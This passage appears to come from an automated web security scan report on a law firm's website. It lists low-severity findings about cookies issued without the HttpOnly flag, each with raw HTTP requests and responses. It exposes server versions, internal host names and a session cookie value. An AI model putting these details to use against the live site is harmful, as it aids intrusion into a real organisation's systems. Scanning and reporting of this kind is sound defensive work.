GET /include_common/YUI/container-min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 72966
Content-Type: application/x-javascript
Last-Modified: Tue, 13 Jan 2009 23:39:04 GMT
Accept-Ranges: bytes
ETag: "09c631ed875c91:1019"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:38 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/

/*
Copyright (c) 2008, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.6.0
*/
(function(){YAHOO.util.Config=function(D){if(D
...[SNIP]...

10.109. http://www.hoganlovells.com/include_common/YUI/slider-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /include_common/YUI/slider-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/YUI/slider-min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 16586
Content-Type: application/x-javascript
Last-Modified: Tue, 13 Jan 2009 23:39:04 GMT
Accept-Ranges: bytes
ETag: "09c631ed875c91:1019"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:39 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/

/*
Copyright (c) 2008, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.6.0
*/
YAHOO.widget.Slider=function(C,A,B,D){YAHOO.wi
...[SNIP]...

10.110. http://www.hoganlovells.com/include_common/YUI/utilities.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /include_common/YUI/utilities.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/YUI/utilities.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 112555
Content-Type: application/x-javascript
Last-Modified: Thu, 30 Apr 2009 18:11:10 GMT
Accept-Ranges: bytes
ETag: "0b3f89bfc9c91:1ad7"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:32 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

/*
Copyright (c) 2008, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.6.0
*/
if(typeof YAHOO=="undefined"||!YAHOO){var YAHO
...[SNIP]...

10.111. http://www.hoganlovells.com/include_common/tool-man/tool-man-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /include_common/tool-man/tool-man-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/tool-man/tool-man-min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hoganlovells.com

Response

HTTP/1.1 200 OK
Content-Length: 15426
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Jul 2008 18:14:52 GMT
Accept-Ranges: bytes
ETag: "0b61b2970f2c81:1019"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:18:49 GMT
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/


var ToolMan={events:function(){if(!ToolMan._eventsFactory)throw"ToolMan Events module isn't loaded";return ToolMan._eventsFactory;},css:function(){if(!ToolMan._cssFactory)throw"ToolMan CSS module is
...[SNIP]...

10.112. http://www.hoganlovells.com/industries/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /industries/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /industries/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1112; path=/
Set-Cookie: PortletId=1060001; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97482


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><meta name="description" content="Hogan Lovells depth of experience, global reach, and compr
...[SNIP]...

10.113. http://www.hoganlovells.com/ja/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /ja/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ja/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:04 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=32308417-b70d-4cb5-972e-0aa99e4aaa2c; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89175


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...

10.114. http://www.hoganlovells.com/newsmedia/awardsrankings/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newsmedia/awardsrankings/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:01:50 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1187; path=/
Set-Cookie: PortletId=1198201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 248617


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...

10.115. http://www.hoganlovells.com/newsmedia/fastfacts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newsmedia/fastfacts/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:08:17 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1188; path=/
Set-Cookie: PortletId=1199201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 95465


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...

10.116. http://www.hoganlovells.com/newsmedia/newspubs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newsmedia/newspubs/ HTTP/1.1
Host: www.hoganlovells.com
Proxy-Connection: keep-alive
Referer: http://www.hoganlovells.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2116759900.1295449738.1295449738.1295449738.1; __utmc=1; __utmb=1.1.10.1295449738; is_returning=1; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; ZoneId=0; SiteId=1039

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:16:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 261917
Content-Length: 261917


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...

10.117. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newsmedia/newspubs/List.aspx HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:29 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 167455


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...

10.118. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/detail.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newsmedia/newspubs/detail.aspx?news=1779 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:30 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 100194


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><meta name="description" content="Hogan Lovells is advising Citi Infrastructure Investors, o
...[SNIP]...

10.119. http://www.hoganlovells.com/newsmedia/timeline/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newsmedia/timeline/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:34:39 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1189; path=/
Set-Cookie: PortletId=1200201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 114336


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...

10.120. http://www.hoganlovells.com/offices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /offices/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /offices/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
